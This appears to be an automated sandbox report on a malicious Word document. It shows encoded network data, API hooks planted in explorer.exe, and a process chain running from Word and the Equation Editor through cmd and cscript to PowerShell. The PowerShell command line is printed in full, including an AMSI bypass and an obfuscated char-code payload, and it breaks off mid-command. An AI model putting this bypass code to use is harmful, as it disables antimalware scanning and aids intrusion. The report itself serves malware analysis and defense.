                                                      2021-12-02 17:26:37 UTC1671INData Raw: 41 34 4e 43 78 67 52 44 67 73 59 45 51 77 4c 47 42 47 4e 69 78 67 4d 30 45 73 59 45 4d 79 4c 47 41 30 4d 53 78 67 51 55 4d 73 59 44 46 45 4c 47 41 78 4d 43 78 67 4f 44 41 73 59 44 4d 30 4c 47 41 30 4f 43 78 67 4d 6a 6b 73 59 45 55 33 4c 47 41 35 4d 69 78 67 52 6b 49 73 59 45 55 30 4c 47 42 45 52 69 78 67 4e 6b 51 73 59 44 6b 31 4c 47 42 46 4e 69 78 67 52 55 49 73 59 44 59 30 4c 47 41 32 4d 53 78 67 4f 45 45 73 59 45 45 31 4c 47 42 43 51 69 78 67 4e 45 45 73 59 44 59 30 4c 47 42 45 4d 79 78 67 51 54 59 73 59 45 4e 45 4c 47 42 44 4d 43 78 67 4e 55 4d 73 59 44 6b 35 4c 47 41 33 4f 43 78 67 4e 54 55 73 59 44 51 30 4c 47 41 77 4e 69 78 67 4d 7a 6b 73 59 45 46 43 4c 47 42 42 51 69 78 67 52 44 49 73 59 44 41 77 4c 47 42 47 51 79 78 67 4f 45 59 73 59 44 4a 45 4c
                                                      Data Ascii: A4NCxgRDgsYEQwLGBGNixgM0EsYEMyLGA0MSxgQUMsYDFELGAxMCxgODAsYDM0LGA0OCxgMjksYEU3LGA5MixgRkIsYEU0LGBERixgNkQsYDk1LGBFNixgRUIsYDY0LGA2MSxgOEEsYEE1LGBCQixgNEEsYDY0LGBEMyxgQTYsYENELGBDMCxgNUMsYDk5LGA3OCxgNTUsYDQ0LGAwNixgMzksYEFCLGBBQixgRDIsYDAwLGBGQyxgOEYsYDJEL
                                                      2021-12-02 17:26:37 UTC1687INData Raw: 41 33 4f 43 78 67 51 54 4d 73 59 44 63 32 4c 47 41 32 4f 53 78 67 51 6b 55 73 59 44 49 30 4c 47 41 7a 52 43 78 67 4e 54 63 73 59 44 51 77 4c 47 41 33 51 53 78 67 4d 55 4d 73 59 45 4d 33 4c 47 41 77 4e 79 78 67 51 7a 4d 73 59 44 42 47 4c 47 42 46 52 69 78 67 4d 54 59 73 59 44 68 42 4c 47 41 33 4f 43 78 67 51 6a 55 73 59 44 6b 31 4c 47 41 78 52 43 78 67 4d 30 55 73 59 45 49 31 4c 47 41 79 51 69 78 67 4d 30 45 73 59 45 4d 34 4c 47 41 77 51 79 78 67 4d 45 55 73 59 44 45 79 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 41 31 4c 47 41 33 51 53 78 67 4f 55 55 73 59 45 49 79 4c 47 41 35 52 69 78 67 4d 44 67 73 59 45 46 42 4c 47 41 35 4f 53 78 67 4d 6b 4d 73 59 45 4d 33 4c 47 42 43 51 69 78 67 4d 44 59 73 59 44 52 43 4c 47 41 35 4e 79 78 67 4e 54 6b 73 59 45 49 77 4c
                                                      Data Ascii: A3OCxgQTMsYDc2LGA2OSxgQkUsYDI0LGAzRCxgNTcsYDQwLGA3QSxgMUMsYEM3LGAwNyxgQzMsYDBGLGBFRixgMTYsYDhBLGA3OCxgQjUsYDk1LGAxRCxgM0UsYEI1LGAyQixgM0EsYEM4LGAwQyxgMEUsYDEyLGAwMCxgOEQsYDA1LGA3QSxgOUUsYEIyLGA5RixgMDgsYEFBLGA5OSxgMkMsYEM3LGBCQixgMDYsYDRCLGA5NyxgNTksYEIwL
                                                      2021-12-02 17:26:37 UTC1703INData Raw: 42 46 4e 53 78 67 4d 45 4d 73 59 45 45 34 4c 47 41 32 51 53 78 67 4e 6a 51 73 59 45 51 31 4c 47 41 7a 4d 79 78 67 51 6b 55 73 59 44 59 31 4c 47 41 79 4d 43 78 67 4d 6a 6b 73 59 45 4d 77 4c 47 42 44 51 79 78 67 52 45 55 73 59 45 46 45 4c 47 41 35 51 69 78 67 4e 45 51 73 59 45 4d 77 4c 47 42 45 4d 53 78 67 51 7a 49 73 59 45 52 43 4c 47 41 32 52 43 78 67 51 54 63 73 59 45 51 79 4c 47 42 45 4e 69 78 67 4f 45 4d 73 59 45 55 78 4c 47 41 31 51 69 78 67 4d 44 6b 73 59 45 59 33 4c 47 41 32 4f 43 78 67 4d 55 59 73 59 44 6b 35 4c 47 41 7a 4d 53 78 67 52 6b 55 73 59 44 41 79 4c 47 41 33 4e 69 78 67 4e 44 63 73 59 44 63 35 4c 47 41 30 52 53 78 67 4d 6b 4d 73 59 44 4e 45 4c 47 42 47 4d 79 78 67 51 30 4d 73 59 44 56 45 4c 47 42 46 4d 79 78 67 51 55 49 73 59 45 4a 42 4c
                                                      Data Ascii: BFNSxgMEMsYEE4LGA2QSxgNjQsYEQ1LGAzMyxgQkUsYDY1LGAyMCxgMjksYEMwLGBDQyxgREUsYEFELGA5QixgNEQsYEMwLGBEMSxgQzIsYERCLGA2RCxgQTcsYEQyLGBENixgOEMsYEUxLGA1QixgMDksYEY3LGA2OCxgMUYsYDk5LGAzMSxgRkUsYDAyLGA3NixgNDcsYDc5LGA0RSxgMkMsYDNELGBGMyxgQ0MsYDVELGBFMyxgQUIsYEJBL
                                                      2021-12-02 17:26:37 UTC1719INData Raw: 41 35 4d 43 78 67 52 55 4d 73 59 44 45 34 4c 47 42 45 52 69 78 67 52 54 4d 73 59 44 4d 32 4c 47 41 77 4d 53 78 67 4d 54 67 73 59 45 4a 42 4c 47 42 47 4d 79 78 67 52 45 45 73 59 44 49 7a 4c 47 42 44 4d 43 78 67 4e 54 45 73 59 44 55 32 4c 47 42 46 4e 53 78 67 4d 30 49 73 59 44 6b 34 4c 47 41 7a 51 79 78 67 51 7a 6b 73 59 44 6b 79 4c 47 41 32 51 79 78 67 4d 6b 49 73 59 44 63 79 4c 47 42 42 4e 43 78 67 4e 55 55 73 59 45 56 45 4c 47 41 7a 4d 79 78 67 4d 54 41 73 59 45 51 79 4c 47 41 33 4d 69 78 67 52 44 55 73 59 45 51 35 4c 47 41 7a 4e 53 78 67 4e 54 63 73 59 45 5a 43 4c 47 41 34 51 69 78 67 52 6b 45 73 59 44 4d 78 4c 47 42 46 4f 53 78 67 4e 7a 67 73 59 45 45 35 4c 47 41 31 4e 79 78 67 4e 7a 4d 73 59 44 6b 30 4c 47 42 47 4e 43 78 67 52 55 59 73 59 45 45 34 4c
                                                      Data Ascii: A5MCxgRUMsYDE4LGBERixgRTMsYDM2LGAwMSxgMTgsYEJBLGBGMyxgREEsYDIzLGBDMCxgNTEsYDU2LGBFNSxgM0IsYDk4LGAzQyxgQzksYDkyLGA2QyxgMkIsYDcyLGBBNCxgNUUsYEVELGAzMyxgMTAsYEQyLGA3MixgRDUsYEQ5LGAzNSxgNTcsYEZCLGA4QixgRkEsYDMxLGBFOSxgNzgsYEE5LGA1NyxgNzMsYDk0LGBGNCxgRUYsYEE4L
                                                      2021-12-02 17:26:37 UTC1735INData Raw: 42 47 4f 43 78 67 4d 44 51 73 59 45 45 78 4c 47 42 44 4f 43 78 67 4e 30 4d 73 59 44 6b 33 4c 47 41 78 4f 53 78 67 4f 54 59 73 59 44 45 78 4c 47 41 77 52 53 78 67 4d 54 67 73 59 44 55 32 4c 47 41 79 51 69 78 67 4e 54 67 73 59 45 56 47 4c 47 41 30 51 69 78 67 4f 55 51 73 59 45 5a 44 4c 47 41 35 52 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 30 4d 53 78 67 52 55 45 73 59 44 45 79 4c 47 41 77 52 69 78 67 4e 55 4d 73 59 44 45 7a 4c 47 41 35 51 53 78 67 52 54 63 73 59 44 45 77 4c 47 41 35 4e 43 78 67 4d 44 59 73 59 45 45 31 4c 47 42 46 4e 79 78 67 4f 44 63 73 59 44 5a 43 4c 47 41 33 4e 79 78 67 52 6a 6b 73 59 45 56 44 4c 47 41 77 4e 43 78 67 4d 30 55 73 59 45 55 32 4c 47 41 78 52 53 78 67 4f 54 41 73 59 44 49 34 4c 47 41 77 52 43 78 67 4f 55 45 73 59 44 4d 7a 4c
                                                      Data Ascii: BGOCxgMDQsYEExLGBDOCxgN0MsYDk3LGAxOSxgOTYsYDExLGAwRSxgMTgsYDU2LGAyQixgNTgsYEVGLGA0QixgOUQsYEZDLGA5RCxgRkMsYEU2LGA0MSxgRUEsYDEyLGAwRixgNUMsYDEzLGA5QSxgRTcsYDEwLGA5NCxgMDYsYEE1LGBFNyxgODcsYDZCLGA3NyxgRjksYEVDLGAwNCxgM0UsYEU2LGAxRSxgOTAsYDI4LGAwRCxgOUEsYDMzL
                                                      2021-12-02 17:26:37 UTC1751INData Raw: 41 33 4d 53 78 67 51 6a 55 73 59 44 5a 45 4c 47 42 46 52 53 78 67 52 44 59 73 59 44 49 79 4c 47 41 33 52 53 78 67 4d 30 4d 73 59 44 45 77 4c 47 42 46 4e 79 78 67 4e 6a 45 73 59 44 51 79 4c 47 41 30 4e 53 78 67 4e 7a 45 73 59 44 45 32 4c 47 42 46 51 53 78 67 4e 54 45 73 59 44 55 32 4c 47 41 7a 52 43 78 67 4e 30 49 73 59 44 49 31 4c 47 42 47 52 69 78 67 51 6b 49 73 59 45 51 32 4c 47 42 43 4d 79 78 67 4f 44 55 73 59 45 45 7a 4c 47 41 77 51 69 78 67 4e 54 63 73 59 44 63 32 4c 47 41 33 52 43 78 67 4e 44 6b 73 59 45 5a 46 4c 47 42 44 4d 53 78 67 4d 7a 6b 73 59 44 46 44 4c 47 41 77 52 53 78 67 4e 54 6b 73 59 44 41 7a 4c 47 41 33 52 43 78 67 51 7a 45 73 59 45 5a 42 4c 47 42 47 4e 79 78 67 4e 7a 67 73 59 45 51 77 4c 47 42 47 51 53 78 67 52 6a 6b 73 59 45 49 35 4c
                                                      Data Ascii: A3MSxgQjUsYDZELGBFRSxgRDYsYDIyLGA3RSxgM0MsYDEwLGBFNyxgNjEsYDQyLGA0NSxgNzEsYDE2LGBFQSxgNTEsYDU2LGAzRCxgN0IsYDI1LGBGRixgQkIsYEQ2LGBCMyxgODUsYEEzLGAwQixgNTcsYDc2LGA3RCxgNDksYEZFLGBDMSxgMzksYDFDLGAwRSxgNTksYDAzLGA3RCxgQzEsYEZBLGBGNyxgNzgsYEQwLGBGQSxgRjksYEI5L
                                                      2021-12-02 17:26:37 UTC1767INData Raw: 42 44 52 53 78 67 4e 54 67 73 59 45 56 43 4c 47 41 31 52 53 78 67 4e 44 55 73 59 44 45 7a 4c 47 41 32 51 53 78 67 4e 54 63 73 59 44 63 78 4c 47 41 79 4d 79 78 67 52 55 55 73 59 45 55 78 4c 47 41 79 4d 79 78 67 4e 54 4d 73 59 45 59 32 4c 47 41 30 52 43 78 67 52 6a 41 73 59 44 55 31 4c 47 42 43 4d 69 78 67 51 6a 63 73 59 45 59 79 4c 47 41 79 4d 53 78 67 51 7a 45 73 59 45 4e 47 4c 47 41 7a 52 53 78 67 52 54 49 73 59 45 59 35 4c 47 41 79 4d 43 78 67 52 45 45 73 59 45 4e 46 4c 47 42 43 4e 43 78 67 4e 44 59 73 59 45 52 45 4c 47 41 79 52 53 78 67 52 6a 6b 73 59 45 49 35 4c 47 41 78 4e 53 78 67 4f 54 4d 73 59 44 55 34 4c 47 41 78 4e 79 78 67 4e 55 59 73 59 44 59 35 4c 47 41 34 52 53 78 67 4d 6b 49 73 59 44 67 33 4c 47 42 42 4f 43 78 67 4f 44 59 73 59 45 4d 33 4c
                                                      Data Ascii: BDRSxgNTgsYEVCLGA1RSxgNDUsYDEzLGA2QSxgNTcsYDcxLGAyMyxgRUUsYEUxLGAyMyxgNTMsYEY2LGA0RCxgRjAsYDU1LGBCMixgQjcsYEYyLGAyMSxgQzEsYENGLGAzRSxgRTIsYEY5LGAyMCxgREEsYENFLGBCNCxgNDYsYERELGAyRSxgRjksYEI5LGAxNSxgOTMsYDU4LGAxNyxgNUYsYDY5LGA4RSxgMkIsYDg3LGBBOCxgODYsYEM3L
                                                      2021-12-02 17:26:37 UTC1783INData Raw: 42 46 51 69 78 67 52 44 59 73 59 44 55 78 4c 47 42 43 4f 53 78 67 52 44 6b 73 59 44 51 34 4c 47 42 45 52 53 78 67 4f 44 6b 73 59 44 67 7a 4c 47 41 30 51 79 78 67 51 6b 45 73 59 45 45 32 4c 47 41 78 51 79 78 67 4e 55 51 73 59 44 6b 7a 4c 47 42 43 52 43 78 67 4e 54 55 73 59 45 55 79 4c 47 41 7a 51 79 78 67 4f 44 59 73 59 44 4d 32 4c 47 41 78 4e 79 78 67 4e 55 4d 73 59 45 56 44 4c 47 42 47 4f 53 78 67 4e 45 51 73 59 45 51 78 4c 47 41 30 4f 53 78 67 51 55 4d 73 59 44 4d 33 4c 47 41 33 4e 69 78 67 4e 54 63 73 59 44 63 32 4c 47 41 30 4d 53 78 67 4d 54 6b 73 59 44 6c 42 4c 47 41 35 52 43 78 67 4d 44 63 73 59 45 55 33 4c 47 41 30 52 53 78 67 52 54 67 73 59 45 55 31 4c 47 41 31 4e 43 78 67 4d 44 67 73 59 45 51 77 4c 47 41 31 4f 43 78 67 4d 45 4d 73 59 44 67 35 4c
                                                      Data Ascii: BFQixgRDYsYDUxLGBCOSxgRDksYDQ4LGBERSxgODksYDgzLGA0QyxgQkEsYEE2LGAxQyxgNUQsYDkzLGBCRCxgNTUsYEUyLGAzQyxgODYsYDM2LGAxNyxgNUMsYEVDLGBGOSxgNEQsYEQxLGA0OSxgQUMsYDM3LGA3NixgNTcsYDc2LGA0MSxgMTksYDlBLGA5RCxgMDcsYEU3LGA0RSxgRTgsYEU1LGA1NCxgMDgsYEQwLGA1OCxgMEMsYDg5L
                                                      2021-12-02 17:26:37 UTC1799INData Raw: 41 77 52 43 78 67 4e 54 51 73 59 45 5a 46 4c 47 42 45 4e 69 78 67 4e 45 51 73 59 44 52 45 4c 47 42 44 4e 53 78 67 52 55 59 73 59 44 45 79 4c 47 41 77 4d 69 78 67 4e 7a 6b 73 59 45 59 78 4c 47 41 34 4d 43 78 67 4e 55 45 73 59 44 55 77 4c 47 42 43 4e 53 78 67 51 30 49 73 59 44 41 78 4c 47 42 45 4e 69 78 67 51 54 59 73 59 45 51 78 4c 47 42 42 52 69 78 67 52 6a 6b 73 59 45 55 35 4c 47 41 30 4d 69 78 67 52 55 49 73 59 44 6b 78 4c 47 41 33 4d 53 78 67 4e 30 51 73 59 44 46 44 4c 47 41 79 51 69 78 67 4f 45 49 73 59 44 59 77 4c 47 41 77 51 69 78 67 4e 30 59 73 59 45 51 77 4c 47 42 45 51 53 78 67 4e 7a 4d 73 59 44 59 78 4c 47 42 42 4d 53 78 67 4e 30 4d 73 59 45 5a 47 4c 47 41 30 4d 43 78 67 4e 55 49 73 59 44 51 31 4c 47 41 79 52 69 78 67 52 45 49 73 59 44 63 31 4c
                                                      Data Ascii: AwRCxgNTQsYEZFLGBENixgNEQsYDRELGBDNSxgRUYsYDEyLGAwMixgNzksYEYxLGA4MCxgNUEsYDUwLGBCNSxgQ0IsYDAxLGBENixgQTYsYEQxLGBBRixgRjksYEU5LGA0MixgRUIsYDkxLGA3MSxgN0QsYDFDLGAyQixgOEIsYDYwLGAwQixgN0YsYEQwLGBEQSxgNzMsYDYxLGBBMSxgN0MsYEZGLGA0MCxgNUIsYDQ1LGAyRixgREIsYDc1L
                                                      2021-12-02 17:26:37 UTC1815INData Raw: 42 44 4f 53 78 67 4f 55 59 73 59 45 45 32 4c 47 41 7a 4e 43 78 67 4d 6a 67 73 59 45 55 33 4c 47 42 42 52 69 78 67 52 6b 51 73 59 45 59 35 4c 47 42 45 4e 43 78 67 52 54 55 73 59 45 49 77 4c 47 41 35 4d 43 78 67 4e 45 45 73 59 45 55 33 4c 47 42 46 52 69 78 67 4d 44 6b 73 59 44 49 31 4c 47 41 34 4f 53 78 67 52 44 59 73 59 44 67 78 4c 47 42 47 4e 43 78 67 4f 54 49 73 59 44 42 42 4c 47 41 77 4d 43 78 67 4e 6a 51 73 59 45 55 31 4c 47 41 77 51 53 78 67 52 44 63 73 59 44 6b 79 4c 47 42 44 4e 69 78 67 4e 44 4d 73 59 44 52 42 4c 47 42 42 4d 43 78 67 4d 44 4d 73 59 44 64 44 4c 47 42 44 4e 53 78 67 4e 7a 4d 73 59 44 6b 30 4c 47 41 31 4d 79 78 67 4d 54 4d 73 59 45 49 33 4c 47 41 78 51 69 78 67 4d 6a 6b 73 59 44 52 44 4c 47 42 44 4e 69 78 67 4e 54 41 73 59 44 59 31 4c
                                                      Data Ascii: BDOSxgOUYsYEE2LGAzNCxgMjgsYEU3LGBBRixgRkQsYEY5LGBENCxgRTUsYEIwLGA5MCxgNEEsYEU3LGBFRixgMDksYDI1LGA4OSxgRDYsYDgxLGBGNCxgOTIsYDBBLGAwMCxgNjQsYEU1LGAwQSxgRDcsYDkyLGBDNixgNDMsYDRBLGBBMCxgMDMsYDdDLGBDNSxgNzMsYDk0LGA1MyxgMTMsYEI3LGAxQixgMjksYDRDLGBDNixgNTAsYDY1L
                                                      2021-12-02 17:26:37 UTC1831INData Raw: 41 34 51 69 78 67 4d 45 49 73 59 44 5a 46 4c 47 42 43 52 43 78 67 52 54 51 73 59 44 4e 42 4c 47 41 77 51 69 78 67 4d 45 4d 73 59 45 45 33 4c 47 41 32 4d 53 78 67 4f 45 51 73 59 44 4d 34 4c 47 42 43 4d 43 78 67 4e 44 6b 73 59 44 67 32 4c 47 41 35 4d 69 78 67 52 6a 59 73 59 44 67 77 4c 47 41 33 4e 43 78 67 4e 6b 49 73 59 45 45 78 4c 47 41 78 52 69 78 67 4d 6a 45 73 59 44 42 45 4c 47 41 78 52 43 78 67 4e 6a 6b 73 59 44 56 44 4c 47 41 35 51 69 78 67 4e 6b 59 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 55 51 73 59 44 55 32 4c 47 41 34 4d 53 78 67 51 7a 55 73 59 45 52 45 4c 47 41 7a 4d 53 78 67 4d 55 51 73 59 45 51 31 4c 47 42 43 4f 43 78 67 4e 6a 49 73 59 44 68 44 4c 47 41 79 52 69 78 67 52 6a 6b 73 59 44 42 43 4c 47 41 31 52 53 78 67 4e 44 63 73 59 45 45 7a 4c
                                                      Data Ascii: A4QixgMEIsYDZFLGBCRCxgRTQsYDNBLGAwQixgMEMsYEE3LGA2MSxgOEQsYDM4LGBCMCxgNDksYDg2LGA5MixgRjYsYDgwLGA3NCxgNkIsYEExLGAxRixgMjEsYDBELGAxRCxgNjksYDVDLGA5QixgNkYsYDAwLGA2NixgOUQsYDU2LGA4MSxgQzUsYERELGAzMSxgMUQsYEQ1LGBCOCxgNjIsYDhDLGAyRixgRjksYDBCLGA1RSxgNDcsYEEzL
                                                      2021-12-02 17:26:37 UTC1847INData Raw: 41 32 52 53 78 67 4d 7a 6b 73 59 44 41 32 4c 47 41 77 51 79 78 67 4d 44 4d 73 59 44 4a 42 4c 47 41 7a 4d 53 78 67 4e 55 4d 73 59 44 6b 79 4c 47 42 44 4f 43 78 67 4e 45 59 73 59 44 6c 42 4c 47 41 35 4e 79 78 67 52 6b 49 73 59 45 55 78 4c 47 42 44 4f 43 78 67 52 44 51 73 59 44 4e 42 4c 47 41 78 52 43 78 67 4e 54 55 73 59 44 68 44 4c 47 41 30 4d 53 78 67 4f 54 49 73 59 44 51 7a 4c 47 41 79 52 69 78 67 51 7a 59 73 59 44 45 31 4c 47 41 34 4e 79 78 67 52 55 49 73 59 45 5a 46 4c 47 42 42 4e 79 78 67 51 6a 67 73 59 44 4a 47 4c 47 41 30 4d 79 78 67 4f 54 6b 73 59 44 4d 33 4c 47 41 79 4e 53 78 67 4e 6a 55 73 59 45 59 33 4c 47 41 35 4d 69 78 67 52 44 67 73 59 45 4e 45 4c 47 41 7a 52 53 78 67 52 55 55 73 59 44 63 33 4c 47 41 34 4e 79 78 67 4f 54 63 73 59 45 51 77 4c
                                                      Data Ascii: A2RSxgMzksYDA2LGAwQyxgMDMsYDJBLGAzMSxgNUMsYDkyLGBDOCxgNEYsYDlBLGA5NyxgRkIsYEUxLGBDOCxgRDQsYDNBLGAxRCxgNTUsYDhDLGA0MSxgOTIsYDQzLGAyRixgQzYsYDE1LGA4NyxgRUIsYEZFLGBBNyxgQjgsYDJGLGA0MyxgOTksYDM3LGAyNSxgNjUsYEY3LGA5MixgRDgsYENELGAzRSxgRUUsYDc3LGA4NyxgOTcsYEQwL
                                                      2021-12-02 17:26:37 UTC1863INData Raw: 41 79 52 69 78 67 51 54 51 73 59 44 45 31 4c 47 41 31 4e 43 78 67 4d 7a 49 73 59 44 6b 31 4c 47 42 46 51 79 78 67 52 6a 41 73 59 44 46 42 4c 47 42 44 51 79 78 67 51 6a 67 73 59 45 5a 43 4c 47 42 43 4d 79 78 67 4e 6a 63 73 59 44 67 78 4c 47 41 7a 52 69 78 67 52 44 55 73 59 44 6b 30 4c 47 42 44 4f 53 78 67 4d 6a 67 73 59 44 56 43 4c 47 41 78 4d 43 78 67 4d 7a 49 73 59 45 51 33 4c 47 42 47 4d 43 78 67 4e 30 51 73 59 44 41 33 4c 47 41 35 4e 43 78 67 52 6b 55 73 59 45 49 7a 4c 47 42 44 4e 43 78 67 52 6b 55 73 59 44 67 7a 4c 47 42 45 51 69 78 67 4d 54 63 73 59 44 55 34 4c 47 42 47 4f 53 78 67 52 6b 4d 73 59 44 6c 47 4c 47 42 46 4f 53 78 67 4d 54 45 73 59 45 45 78 4c 47 41 33 4d 43 78 67 4f 55 45 73 59 45 4d 31 4c 47 41 32 4d 43 78 67 4d 44 45 73 59 45 51 33 4c
                                                      Data Ascii: AyRixgQTQsYDE1LGA1NCxgMzIsYDk1LGBFQyxgRjAsYDFBLGBDQyxgQjgsYEZCLGBCMyxgNjcsYDgxLGAzRixgRDUsYDk0LGBDOSxgMjgsYDVCLGAxMCxgMzIsYEQ3LGBGMCxgN0QsYDA3LGA5NCxgRkUsYEIzLGBDNCxgRkUsYDgzLGBEQixgMTcsYDU4LGBGOSxgRkMsYDlGLGBFOSxgMTEsYEExLGA3MCxgOUEsYEM1LGA2MCxgMDEsYEQ3L
                                                      2021-12-02 17:26:37 UTC1875INData Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c
                                                      Data Ascii: AwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwL


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function Name    Hook Type    Active in Processes
                                                      PeekMessageA     INLINE       explorer.exe
                                                      PeekMessageW     INLINE       explorer.exe
                                                      GetMessageW      INLINE       explorer.exe
                                                      GetMessageA      INLINE       explorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: USER32.dll
                                                      Function Name    Hook Type    New Data
                                                      PeekMessageA     INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                      PeekMessageW     INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                      GetMessageW      INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                      GetMessageA      INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                      System Behavior

                                                      General

                                                      Start time:18:25:17
                                                      Start date:02/12/2021
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                      Imagebase:0x13f800000
                                                      File size:1423704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:18:25:19
                                                      Start date:02/12/2021
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:18:25:20
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:CmD.exe /C cscript %tmp%\Client.vbs A C
                                                      Imagebase:0x4a470000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:18:25:21
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
                                                      Imagebase:0x460000
                                                      File size:126976 bytes
                                                      MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      General

                                                      Start time:18:25:22
                                                      Start date:02/12/2021
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,
